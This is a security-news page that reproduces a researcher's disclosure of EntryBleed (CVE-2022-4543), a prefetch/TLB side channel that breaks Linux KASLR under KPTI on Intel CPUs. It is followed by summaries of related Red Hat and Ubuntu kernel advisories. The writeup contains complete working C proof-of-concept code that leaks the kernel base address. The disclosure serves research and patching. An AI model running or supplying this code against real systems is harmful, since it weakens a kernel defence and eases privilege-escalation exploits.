Headline
CVE-2022-4543: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)
A flaw named “EntryBleed” was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.
Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”
KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.
In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”
Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.
For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!
At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000).
An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page’s page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: “global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables.” I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I’m misunderstanding the code, so it would be great if someone can correct me if I’m wrong here.
Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup_64):
#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL_LOWER_BOUND 0xffffffff80000000ull #define KERNEL_UPPER_BOUND 0xffffffffc0000000ull #define entry_SYSCALL_64_offset 0x400000ull uint64_t sidechannel(uint64_t addr) { uint64_t a, b, c, d; asm volatile (“.intel_syntax noprefix;” “mfence;” “rdtscp;” “mov %0, rax;” “mov %1, rdx;” “xor rax, rax;” “lfence;” “prefetchnta qword ptr [%4];” “prefetcht2 qword ptr [%4];” “xor rax, rax;” “lfence;” “rdtscp;” “mov %2, rax;” “mov %3, rdx;” “mfence;” “.att_syntax;” : “=r” (a), “=r” (b), “=r” ©, “=r” (d) : “r” (addr) : "rax", "rbx", "rcx", “rdx”); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset #define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset #define DUMMY_ITERATIONS 5 #define ITERATIONS 100 #define ARR_SIZE (SCAN_END - SCAN_START) / STEP uint64_t leak_syscall_entry(void) { uint64_t data[ARR_SIZE] = {0}; uint64_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { for (uint64_t idx = 0; idx < ARR_SIZE; idx++) { uint64_t test = SCAN_START + idx * STEP; syscall(104); uint64_t time = sidechannel(test); if (i >= DUMMY_ITERATIONS) data[idx] += time; } } for (int i = 0; i < ARR_SIZE; i++) { data[i] /= ITERATIONS; if (data[i] < min) { min = data[i]; addr = SCAN_START + i * STEP; } printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]); } return addr; } int main() { printf ("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset); }
KASLR bypassed on systems with KPTI in less than 100 lines of C!
I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H, i7-9700F, i7-9750H, Xeon® CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I’m not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don’t have direct access to any AMD hardware (see edit in the end). Lastly, I don’t believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.
Here is a demonstration of it (kernel base is printed before the shell for comparison purposes):
One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.
In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed [email protected] as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.
I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!
Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn’t surprising given this paper and this security advisory. However, it’s also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.
Related news
Red Hat Security Advisory 2023-4137-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include out of bounds access and use-after-free vulnerabilities.
An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1016: A flaw was found in the Linux kernel in net/netfilter/nf_tables_core.c:nft_do_chain, which can cause a use-after-free. This issue needs to handle 'return' with proper preconditions, as it can lead to a kernel information leak problem caused by a local, unprivileged attacker. * CVE-2022-42703: A memory leak flaw with us...
Logging Subsystem 5.7.2 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41723: A flaw was found in golang. A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests. * CVE-2023-27539: A denial of service vulnerability was found in rubygem-rack in how it parses headers. A carefully crafted input can cause header parsing to take an unexpe...
Red Hat Security Advisory 2023-3388-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass and use-after-free vulnerabilities.
Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.
An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-26341: A flaw was found in hw. This issue can cause AMD CPUs to transiently execute beyond unconditional direct branches. * CVE-2021-33655: An out-of-bounds write flaw was found in the Linux kernel’s framebuffer-based console driver functionality in the way a user triggers ioctl FBIOPUT_VSCREENINFO with malicious data. This flaw allows a local user t...
Red Hat Security Advisory 2023-2148-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow, bypass, denial of service, double free, memory leak, null pointer, out of bounds read, privilege escalation, traversal, and use-after-free vulnerabilities.
Red Hat Security Advisory 2023-2458-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow, bypass, denial of service, double free, memory leak, null pointer, out of bounds read, privilege escalation, traversal, and use-after-free vulnerabilities.
An update for kernel is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-26341: A flaw was found in hw. This issue can cause AMD CPUs to transiently execute beyond unconditional direct branches. * CVE-2021-33655: An out-of-bounds write flaw was found in the Linux kernel’s framebuffer-based console driver functionality in the way a user triggers ioctl FBIOPUT_VSCREENINFO with malicious data. This flaw allows a local user to c...
Red Hat Security Advisory 2023-1091-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.
An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-4378: A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system. * CVE-2022-42703: A memory leak flaw with use-after-free capability was found in the Linux kernel. The VMA mm/rmap.c fun...
Ubuntu Security Notice 5916-1 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Ubuntu Security Notice 5789-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
Ubuntu Security Notice 5774-1 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the instruction emulator of the Linux kernel on Arm 64-bit systems. A local attacker could use this to cause a denial of service.
Ubuntu Security Notice 5756-3 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a memory leak existed in the IPv6 implementation of the Linux kernel. A local attacker could use this to cause a denial of service.
Ubuntu Security Notice 5756-2 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a memory leak existed in the IPv6 implementation of the Linux kernel. A local attacker could use this to cause a denial of service.
Ubuntu Security Notice 5755-2 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Ubuntu Security Notice 5757-2 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the video4linux driver for Empia based TV cards in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Ubuntu Security Notice 5757-1 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the video4linux driver for Empia based TV cards in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Ubuntu Security Notice 5756-1 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a memory leak existed in the IPv6 implementation of the Linux kernel. A local attacker could use this to cause a denial of service.
Ubuntu Security Notice 5755-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.